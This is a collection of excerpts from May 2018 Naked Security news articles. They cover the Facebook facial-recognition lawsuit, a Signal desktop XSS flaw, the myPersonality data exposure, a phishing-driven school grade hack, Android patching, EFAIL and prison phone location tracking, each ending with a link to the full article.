Facebook can’t wiggle out of facial recognition lawsuit, judge says

By Lisa Vaas

Three years ago, Facebook was hit with a class action lawsuit over allegedly violating privacy rights by “secretly” sticking users’ faces into its huge database without their consent.

No, you can’t wiggle out of this one, a San Francisco federal judge said a year later, refusing to approve Facebook’s request to toss the suit.

On Monday, he said it again. In his order, US District Judge James Donato scolded Facebook, noting “a troubling theme” in the social media network’s “voluminous” submissions (there have been hundreds of pages) of briefs, documents, emails, deposition testimony and expert opinions.

Namely, they show that Facebook’s reverting to “the faulty proposition” that plaintiffs must show an “actual” injury beyond the invasion of the privacy rights afforded by Illinois’s 2008 Biometric Information Privacy Act (BIPA), over which the class action suit was filed.

That’s not what the court’s prior decisions said, Donato wrote.

The Court expressly rejected that contention in considerable detail in the class certification order and the order finding… standing to sue.

A class was certified for that exact reason. BIPA does not require additional proof of individualized “actual” harm, and so the question of whether Facebook is liable can be decided in “one stroke” for the class as a whole without a likelihood that individualized inquiries would overwhelm commonality and predominance.

Donato said that to contend otherwise is to “misread and misrepresent the Court’s orders.”

Therefore, Facebook’s got to face the facial-recognition music, he said. Donato dismissed requests by both parties to get a summary judgment decision, given that the parties can’t agree on so many things, including whether the collection of “facial geometry” amounts to facial recognition or not.

Read more at https://nakedsecurity.sophos.com/2018/05/16/facebook-cant-wiggle-out-of-facial-recognition-lawsuit-judge-says/

Serious XSS vulnerability discovered in Signal

By John E Dunn

Researchers have discovered a serious cross-site scripting (XSS) vulnerability affecting all desktop versions of Edward Snowden’s favorite security application, Signal.

An XSS flaw is a nuisance in any application but in Signal, used by parties that want the highest levels of privacy, this is amplified.

An attacker posing as a contact could use the flaw to send a message containing a malicious URL to set up a range of code-injection compromises using image, audio or iFrame tags, or simply to make the software crash.

Researcher Iván Ariel Barrera Oro, the flaw’s co-discoverer, described how he had chanced upon the issue completely by accident:

The critical thing here was that it didn’t required any interaction from the victim, other than simply being in the conversation.

Which meant:

Inside iframes, everything was possible, even loading code from an SMB share! This enables an attacker to execute remote code without caring about CSP [Content Security Policy].

That’s not a compromise of the software’s end-to-end encryption, but it would be helpful to an attacker trying to trick a would-be victim into giving up information about themselves.

Designated CVE-2018-10994, the flaw affects all desktop versions (Windows, Mac, Linux) but not the mobile Android or iOS apps. The vulnerable versions are v1.7.1, v1.8.0, v1.9.0, and v1.10.0, fixed by upgrading to v1.10.1 or v1.11.0-beta.3.

Read more at https://nakedsecurity.sophos.com/2018/05/16/serious-xss-vulnerability-discovered-in-signal/

Facebook app left 3 million users’ data exposed for four years

By Lisa Vaas

After being burned to a crisp having been found to be manhandling Facebook users’ data, Cambridge Analytica’s ashes blew away on 2 May.

Before it did, former employees had told Gizmodo that they knew the writing was on the wall for the data analytics company, but they didn’t realize how fast the flames would engulf it.

It felt unjust, they seemed to believe. They were just a “typical member of their industry caught in a media firestorm,” as Gizmodo put it. You can see why they’d feel unfairly singled out: in short order, it became clear that Cambridge Analytica wasn’t an aberration. A twin named Cubeyou turned up in April: yet another firm that dressed up its personal-data snarfing as “nonprofit academic research,” in the form of personality quizzes, and handed over the data to marketers.

And now, we have a triplet.

A New Scientist investigation has found that yet another popular Facebook personality app used as a research tool by academics and companies – this one is called myPersonality – fumbled the data of three million Facebook users, including their answers to intimate questionnaires.

Academics at the University of Cambridge distributed data from myPersonality to hundreds of researchers via a website with lousy security… and left it there for anybody to get at, for four years.

New Scientist described the data as being “highly sensitive, revealing personal details of Facebook users, such as the results of psychological tests.” It was meant to be stored and shared anonymously, but “such poor precautions were taken that deanonymizing would not be hard,” it reports.

People had to register as a project collaborator to get access to the full data set, and more than 280 people from nearly 150 institutions did so, including university researchers and those from companies including Facebook, Google, Microsoft and Yahoo.

No permanent academic contract? No big-name company paying you to do research? No problem. For four years, there’s been a username and password to get at the data. The credentials have been sitting on the code-sharing website GitHub. A simple web search would lead you to the working credentials.

Read more at https://nakedsecurity.sophos.com/2018/05/15/facebook-app-left-3-million-users-data-exposed-for-four-years/

Read more at https://nakedsecurity.sophos.com/2018/05/15/facebook-app-left-3-million-users-data-exposed-for-four-years/

Police dog sniffs out USB drive to snare school hacker

By Lisa Vaas

Thanks to a trained police dog sniffing out a thumb drive hidden inside a box of tissues, a high schooler in a San Francisco Bay area suburb has been accused of hacking grades: some students’ grades got bumped up, and some got elbowed down.

Local TV station KPIX reports that police in Concord – the eighth largest city in the area – say that the hack started with a phishing email.

The mail went out to teachers at Ygnacio Valley High School and linked to a website disguised to look like a Mount Diablo School District site. Concord Police Sergeant Carl Cruz told KPIX that the message prompted recipients to go to the bogus site and then…

…to log in to refresh your password or reset something.

…which one teacher did, thereby handing the hacker their login credentials,

Police aren’t releasing the name of the suspect, since he’s underage. They’re accusing him of using the teacher’s login to get into the electronic grading system and boost or lower 16 students’ grades. That includes his own grades, which he raised, police claim.

KPIX say that police traced an “electronic trail” – an IP address, one assumes – to the suspect’s house and searched it last Wednesday.

That’s where Doug the Dog and a USB drive tucked into a box of tissues comes in. The K-9 is one of the few police dogs trained to sniff out electronic devices, and “that’s what he did,” Sergeant Cruz said.

We’ve previously written about another electronics-sniffing dog named Thoreau who helped to catch an alleged pedophile by sniffing out hidden hard drives.

Read more at https://nakedsecurity.sophos.com/2018/05/15/police-dog-sniffs-out-usb-drive-to-snare-school-hacker/

The next Android version’s killer feature? Security patches

By John E Dunn

Big news for Android users – the next version of Google’s mobile OS will require device makers to agree to implement regular security patches for the first time in the operating system’s history.

For now, the only evidence we have for this development is a brief and easy-to-miss comment made at last week’s I/O conference by Android’s director of security, David Kleidermacher.

Still, his words don’t leave much wiggle room:

We’ve also worked on building security patching into our OEM agreements. Now this will really lead to a massive increase in the number of devices and users receiving regular security patches.

About time security watchers will say as they survey the mess of Android’s fragmentation, which, paradoxically, has grown more pronounced as the OS has recently matured.

That maturity has come at a price – a new version every year – which sounds great until you contemplate the consequences of large numbers of devices with security vulnerabilities that won’t or can’t be patched.

Android fragmentation happens on two axes at the same time, namely the annual updates to the OS (which add new features and architecture tweaks), and monthly security updates.

Consider that in the nine years between Android Cupcake in April 2009 and the forthcoming Android P, Google will have produced 14 versions of its mobile OS.

Read more at https://nakedsecurity.sophos.com/2018/05/15/the-next-android-versions-killer-feature-security-patches/

The EFAIL vulnerability – why it’s OK to keep on using email

By Paul Ducklin

This week’s bug of the month is the trendily-named EFAIL.

Like many groovy bugs these days, it’s both a BWAIN (bug with an impressive name) and a BWIVOL (bug with its very own logo, shown in the image at the top of this article).

The name is a pun of sorts on the word “email”, and the bug is caused by a flaw in the specifications set down for two popular standards used for email encryption, namely OpenPGP and S/MIME.

Simply put, the EFAIL vulnerabilities are a pair of security holes that a crook might be able to use to trick recipients of encrypted messages into leaking out some or all of their decrypted content.

Note that this attack only applies if you are using S/MIME or OpenPGP for end-to-end email encryption.

If you aren’t using either of these add-ons in your email client, this vulnerability doesn’t affect you – after all, if the crooks can sniff out your original messages and they’re not encrypted, they’ve got your plaintext already.

Note also that this attack doesn’t work on all messages; it doesn’t work in real time; you need a copy of the original encrypted message; it only works with some email clients; and it pretty much requires both HTML rendering and remote content download turned on in your email client.

Additionally, for one of the flavors of the attack, you have to know, or be able to guess correctly, some of the plaintext from the original message.

Technically speaking, these attacks aren’t strictly due to bugs, but rather to sloppy standards in S/MIME and OpenPGP that aren’t strict enough by design to inhibit this sort of “message tweaking”.

In the short term, you can expect updates to affected email clients that do their best to suppress these holes; in the long term, you should hope for improved standards for end-to-end email encryption.

In the immediate term, we’ve provided some steps below that you can take to protect yourself right now.

Read more at https://nakedsecurity.sophos.com/2018/05/15/the-efail-vulnerability-why-its-ok-to-keep-on-using-email/

Prison phone service can expose the location of anyone with a phone

By Lisa Vaas

In late April, somebody sent a letter containing meth to an inmate at an Arizona jail.

Tracking down the correspondent was no problem. Police looked at phone calls between the meth sender’s address and the inmate and then made an arrest, according to what Matthew Thomas, chief deputy of the Pinal County Sheriff’s Office, told the New York Times.

It was push-button easy thanks to the police having access to a location data lookup service from a company called Securus Technologies that provides and monitors calls to inmates. According to the Times, marketing documents show that the service, which is typically used by marketers and other businesses, gets the location data from major cellphone carriers, including AT&T, Sprint, T-Mobile and Verizon.

It’s far too easy to get that data, some say. Privacy experts, at least one legislator, and inmates’ families say the service, which is fed by data from a mobile marketing company called 3Cinteractive, enables users to look up the whereabouts of nearly any mobile phone in the country, within seconds, without verifying the warrants or affidavits that Securus requires users to upload.

The system is typically used by marketers who offer deals to people based on their location.

It brings back memories of a Google scheme, revealed last year, that aims to track users in real life. As Google announced at its annual Marketing Next conference in May 2017, it wants to go beyond just serving ads to consumers. Using an artificial intelligence (AI) tool called Attribution, it said it would follow us around to see where we go, tracking us across devices and channels – mobile, desktop and in physical stores – to see what we’re buying, to match purchases up with what ads we’ve seen, and to then automatically tell marketers what we’re up to and what ads have paid off.

The Electronic Privacy Information Center (EPIC) was none too happy about the idea. In short order, EPIC filed a complaint with the Federal Trade Commission (FTC) to stop Google from tracking in-store purchases.

Read more at https://nakedsecurity.sophos.com/2018/05/15/prison-phone-service-can-expose-the-location-of-anyone-with-a-phone/